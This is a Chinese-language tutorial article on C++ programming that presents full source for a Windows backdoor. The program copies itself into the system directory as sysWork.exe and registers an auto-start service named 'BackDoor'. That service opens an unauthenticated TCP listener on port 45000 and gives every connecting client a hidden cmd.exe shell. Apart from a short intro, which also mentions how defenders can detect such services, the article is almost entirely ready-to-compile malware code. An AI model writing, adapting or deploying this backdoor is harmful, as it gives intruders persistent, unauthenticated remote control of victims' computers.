C++语言程序设计之实现后门的服务自启动
王永明 2019-04-10 来源 : 阅读 184 评论 0

摘要:本文将带你了解C++语言程序设计之实现后门的服务自启动,希望本文对大家C++语言程序设计有所帮助。

本文将带你了解C++语言程序设计之实现后门的服务自启动,希望本文对大家C++语言程序设计有所帮助。


C++语言程序设计之实现后门的服务自启动




Windows NT 系统后门要实现自启动有许多种方法,例如注册表自启动、映像劫持技术、SVCHost 自启动以及本章节介绍的服务自启动等,其中服务自启动相对于上述其他三种需要直接修改注册表的启动方式而言更不容易被发现。需要注意的是,创建服务同样会在 HKLM\SYSTEM\CurrentControlSet\Services 下生成对应的注册表项,并在系统事件日志中留下服务安装记录(事件 ID 7045),因此防守方仍可据此进行检测。

C++代码样例


   

//////////////////////////////////////////////////////////////

//

// FileName : ServiceAutoRunDemo.cpp

// Creator : PeterZ1997

// Date : 2018-5-4 23:19

// Comment : Create Service to make the BackDoor Run Automatically

//

//////////////////////////////////////////////////////////////

 

#include <iostream>

#include <winsock2.h>

#include <winsock.h>

#include <windows.h>

#include <winsvc.h>

#include <cstdio>

#include <cstring>

#pragma comment(lib, "ws2_32.lib")

 

using namespace std;

 

#define SERVICE_OP_ERROR -1   // return code of InstallService/RemoveService: a service-manager call failed

#define SERVICE_ALREADY_RUN -2   // return code of InstallService: StartService reported ERROR_SERVICE_ALREADY_RUNNING

 

const unsigned int MAX_COUNT = 255; /// String Max Length (size of every CHAR buffer in this file)

const DWORD PORT = 45000;           /// Listen Port (TCP; RunService binds it on INADDR_ANY, i.e. every interface)

const unsigned int LINK_COUNT = 30; /// Max Link Number (listen backlog and number of clients RunService accepts; the per-client arrays in RunService are sized 30 to match)

 

SERVICE_STATUS g_ServiceStatus;          // status block reported to the SCM; written by ServiceMain and ServiceControl

SERVICE_STATUS_HANDLE g_hServiceStatus;  // handle returned by RegisterServiceCtrlHandler, used for SetServiceStatus

 

/**
 * @brief CallBack Function to Translate Service Control Code
 *
 * Control handler registered by ServiceMain through RegisterServiceCtrlHandler.
 * It only rewrites fields of the global g_ServiceStatus according to the
 * received control code and reports that block back to the SCM. Nothing here
 * closes the listening socket or signals the RunService worker thread; that
 * teardown is left to process exit.
 *
 * @param dwCode Service Control Code
 */
void WINAPI ServiceControl(DWORD dwCode)

{

    switch (dwCode)

    {

        // pause: only the reported state changes, the listener keeps running

    case SERVICE_CONTROL_PAUSE:

        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;

        break;

        // continue: report RUNNING again

    case SERVICE_CONTROL_CONTINUE:

        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

        break;

        // stop: report STOPPED with a clean exit code and no pending checkpoint

    case SERVICE_CONTROL_STOP:

        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;

        g_ServiceStatus.dwWin32ExitCode = 0;

        g_ServiceStatus.dwCheckPoint = 0;

        g_ServiceStatus.dwWaitHint = 0;

        break;

        // interrogate: the current status is re-reported unchanged below

    case SERVICE_CONTROL_INTERROGATE:

        break;

        // any other control code is ignored (status is still re-reported)

    default:

        break;

    }

    // push the (possibly updated) status block to the SCM; failure is only printed

    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)

    {

        printf("Set Service Status Error\n");

    }

    return;

}

 

/**
 * @brief Start Remote Shell
 *
 * Thread entry for one accepted client. lpParam is the client SOCKET that
 * RunService passed as an LPVOID; it is installed as stdin/stdout/stderr of a
 * hidden cmd.exe, so the remote peer talks to the shell directly over the TCP
 * connection. The thread blocks until that cmd.exe exits. The client socket
 * itself is never closed by this function.
 *
 * @param lpParam the Client Handle (a SOCKET cast to LPVOID by RunService)
 * @return always 0
 */
DWORD WINAPI StartShell(LPVOID lpParam)

{

    STARTUPINFO si;

    PROCESS_INFORMATION pi;

    CHAR cmdline[MAX_COUNT] = { 0 };

    GetStartupInfo(&si);

    si.cb = sizeof(STARTUPINFO);

    // all three standard handles of the child point at the client socket

    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;

    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    si.wShowWindow = SW_HIDE;   // the child gets no visible window

    // build "<system directory>\cmd.exe"; the GetSystemDirectory return value is not checked

    GetSystemDirectory(cmdline, sizeof(cmdline));

    strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");

    // retries forever, 100 ms apart, until CreateProcess succeeds;
    // bInheritHandles=TRUE so the socket handle is inherited by the child

    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))

    {

        Sleep(100);

    }

    // block until the shell exits, then release the process and thread handles

    WaitForSingleObject(pi.hProcess, INFINITE);

    CloseHandle(pi.hProcess);

    CloseHandle(pi.hThread);

    return 0;

}

 

/**
 * @brief Service Running Function
 *
 * Worker thread started by ServiceMain. Initialises Winsock, binds a TCP
 * listener on every interface at PORT, then accepts exactly LINK_COUNT
 * connections. Each accepted socket is handed to a StartShell thread and
 * greeted with a banner; the peer address is never inspected, so no
 * authentication or filtering happens between accept() and the shell.
 * After LINK_COUNT clients the function waits for all shell threads and
 * returns. Every error path returns 0 without WSACleanup or closesocket.
 *
 * @param lpParam NULL (unused)
 * @return always 0
 */
DWORD WINAPI RunService(LPVOID lpParam)

{

    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";

    // per-client storage; sized 30, which matches LINK_COUNT

    SOCKET sClient[30];

    DWORD dwThreadId[30];

    HANDLE hThread[30];

    WSADATA wsd;

    // 0x0202 requests Winsock 2.2

    if (WSAStartup(0x0202, &wsd))

    {

        printf("WSAStartup Process Error\n");

        return 0;

    }

    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    sockaddr_in sin;

    sin.sin_family = AF_INET;

    sin.sin_port = htons(PORT);

    sin.sin_addr.S_un.S_addr = INADDR_ANY;   // listen on all local addresses

    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;

    if (listen(sListen, LINK_COUNT)) return 0;

    // accept loop: int i is compared against the unsigned LINK_COUNT

    for (int i = 0; i < LINK_COUNT; i++)

    {

        // peer address is discarded (NULL, NULL); accept() return value is not checked

        sClient[i] = accept(sListen, NULL, NULL);

        // one shell thread per client; the SOCKET is passed as the thread parameter

        hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);

        // banner is sent after the thread is already running

        send(sClient[i], wMessage, strlen(wMessage), 0);

    }

    // wait for every shell thread; handles in hThread are not closed afterwards

    WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);

    return 0;

}

 

/**
 * @brief the Main Function of the Service
 *
 * Entry point the SCM calls for the "BackDoor" service (the name here must
 * match the SERVICE_TABLE_ENTRY in main). Fills in g_ServiceStatus, registers
 * ServiceControl as the control handler, reports RUNNING, then starts the
 * RunService worker thread and returns immediately. The thread handle is
 * never closed and dwArgc/lpArgv are not used.
 *
 * @param dwArgc argument count passed by the SCM (unused)
 * @param lpArgv argument vector passed by the SCM (unused)
 */
void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)

{

    HANDLE hThread;

    // initial status: start pending, accepts stop and pause/continue

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;

    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;

    g_ServiceStatus.dwServiceSpecificExitCode = 0;

    g_ServiceStatus.dwServiceType = SERVICE_WIN32;

    g_ServiceStatus.dwWaitHint = 0;

    g_ServiceStatus.dwWin32ExitCode = 0;

    // register the control handler under the service name used in main's table

    g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);

    if (!g_hServiceStatus)

    {

        printf("Register Service Error\n");

        return;

    }

    // RUNNING is reported before the worker thread exists

    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwWaitHint = 0;

    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))

    {

        OutputDebugString("SetServiceStatus Error !\n");

        return;

    }

    // the listener runs on its own thread; this function does not wait for it

    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);

    if (!hThread)

    {

        printf("Create Thread Error\n");

    }

    return;

}

 

/**
 * @brief Install Service
 *
 * Copies the running executable to "<system directory>\sysWork.exe", then
 * creates (or opens, if it already exists) an auto-start own-process service
 * named "BackDoor" with that path as its binary, starts it and polls until
 * it reports RUNNING. OpenSCManager is requested with SC_MANAGER_ALL_ACCESS,
 * so the caller needs administrative rights. From a defender's side the
 * observable artifacts of this function are the service name/display name
 * "BackDoor" and the sysWork.exe copy in the system directory.
 *
 * @return 0 on success, SERVICE_OP_ERROR on any service-manager failure,
 *         SERVICE_ALREADY_RUN if the service was already running
 */
int APIENTRY InstallService()

{

    DWORD dwErrorCode;

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    CHAR szSystemPath[MAX_COUNT] = "\0";

    CHAR szFileSelfPath[MAX_COUNT] = "\0";

    // build the destination path and find our own executable path

    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));

    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));

    // two-argument strcat_s template overload deduces the buffer size from the array

    strcat_s(szSystemPath, "\\sysWork.exe");

    // bFailIfExists=true and the return value is ignored: an existing copy is silently kept

    CopyFile(szFileSelfPath, szSystemPath, true);

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Can not Open the Service Manager\n");

        return SERVICE_OP_ERROR;

    }

    printf("Service Manager Opened Success\n");

    // own-process, auto-start at boot, errors ignored by the SCM; binary path is the copied file

    hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);

    if (!hServiceHandle)

    {

        dwErrorCode = GetLastError();

        // only ERROR_SERVICE_EXISTS is handled; on any other error hServiceHandle stays NULL
        // and execution continues into StartService below

        if (dwErrorCode == ERROR_SERVICE_EXISTS)

        {

            hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

            if (!hServiceHandle)

            {

                printf("Can not Create/Open Service\n");

                // hServiceHandle is NULL here; hscManager is not closed on this path

                CloseServiceHandle(hServiceHandle);

                return SERVICE_OP_ERROR;

            }

            else

            {

                printf("Service Opened Success\n");

            }

        }

    }

    else {

        printf("Service Create Success\n");

    }

    if (!StartService(hServiceHandle, 0, NULL))

    {

        dwErrorCode = GetLastError();

        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)

        {

            printf("SERVEICE IS ALREADY RUNNING\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_ALREADY_RUN;

        }

        else

        {

            printf("SERVEICE START ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

    }

    // poll the service state: keep sleeping while START_PENDING, fail on anything other than RUNNING

    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)

        {

            Sleep(100);

            continue;

        }

        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)

        {

            printf("Service Start Process ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

        else

        {

            break;

        }

    }

    // if the loop above ended because QueryServiceStatus failed, this second query reports it

    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Service Start Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

 

/**
 * @brief Remove Service
 *
 * Opens the "BackDoor" service with SC_MANAGER_ALL_ACCESS (administrative
 * rights required), sends SERVICE_STOP if it is currently RUNNING, and marks
 * it for deletion with DeleteService. The stop request's result is not
 * checked and the function does not wait for the service to reach STOPPED.
 * The sysWork.exe copy placed by InstallService is not deleted here.
 * Unlike InstallService this function uses the default calling convention.
 *
 * @return 0 on success, SERVICE_OP_ERROR on any service-manager failure
 */
int RemoveService()

{

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Open Service Manager Error\n");

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Manager Success\n");

    hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

    if (!hServiceHandle)

    {

        printf("Open Service Error\n");

        // hscManager is not closed on this path

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Success\n");

    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)

        {

            // best-effort stop; return value ignored, no wait for completion

            ControlService(hServiceHandle, SERVICE_STOP, &ssServiceStatus);

        }

    }

    else

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    // marks the service for deletion; the on-disk copy is left in place

    if (!DeleteService(hServiceHandle))

    {

        printf("Delete Service Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Remove Service Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

/**
 * @brief main Function
 *
 * Always tries StartServiceCtrlDispatcher first. When the process was
 * launched by the SCM this runs ServiceMain and returns once the service has
 * stopped; when launched from a console the dispatcher call fails and
 * execution simply falls through to the command-line handling below.
 * "--install" and "--remove" (compared case-insensitively) call
 * InstallService / RemoveService; anything else prints the usage line.
 *
 * @param argc argument count
 * @param argv argument vector; argv[1] is "--install" or "--remove"
 * @return always 0
 */
int main(int argc, char* argv[])

{

    // service table: the name must match the one passed to RegisterServiceCtrlHandler in ServiceMain

    SERVICE_TABLE_ENTRY svTable[] = {

        {(LPSTR)"BackDoor",ServiceMain},

        {NULL,NULL}

    };

    // return value is not checked, so a failed (console) dispatch is indistinguishable from a finished service run

    StartServiceCtrlDispatcher(svTable);

    if (argc == 2)

    {

        // stricmp: non-standard MSVC name for the case-insensitive compare (_stricmp is the conformant spelling)

        if (!stricmp(argv[1], "--install"))

        {

            // SERVICE_OP_ERROR is -1, so "& SERVICE_OP_ERROR" equals the return value itself:
            // any non-zero result, including SERVICE_ALREADY_RUN (-2), takes the error branch

            if (InstallService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else if (!stricmp(argv[1], "--remove"))

        {

            // same bitwise-AND-with-minus-one test as above: true for any non-zero return

            if (RemoveService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else

        {

            printf("[Usage] => *.exe [--install]/[--remove]\n");

        }

    }

    else {

        // also reached after the service run ends, since the SCM starts the process without arguments

        printf("[Usage] => *.exe [--install]/[--remove]\n");

    }

    return 0;

}


   

